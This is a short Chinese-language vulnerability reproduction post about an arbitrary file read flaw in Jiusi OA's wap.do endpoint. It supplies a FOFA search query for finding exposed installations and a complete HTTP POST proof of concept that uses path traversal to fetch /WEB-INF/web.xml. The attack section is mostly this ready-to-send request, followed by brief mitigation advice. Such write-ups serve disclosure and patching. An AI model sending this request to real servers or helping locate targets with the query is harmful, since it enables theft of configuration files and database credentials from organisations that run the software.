九思OA wap.do 任意文件读取漏洞复现

0x01 产品简介

九思OA系统是安装、实施、学习、操作、维护的OA系统，由北京九思协同软件有限公司开发。

0x02 漏洞概述

北京九思协同办公软件wap.do接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：app="九思软件-OA"

0x04 漏洞复现

PoC

POST /jsoa/wap.do?method=downLoad HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

path=../&name=&FileName=/WEB-INF/web.xml

0x05 修复建议

对用户传入的参数进行限制。

通过防火墙等安全设备设置访问策略，设置白名单访问。

如非必要，禁止公网访问该系统。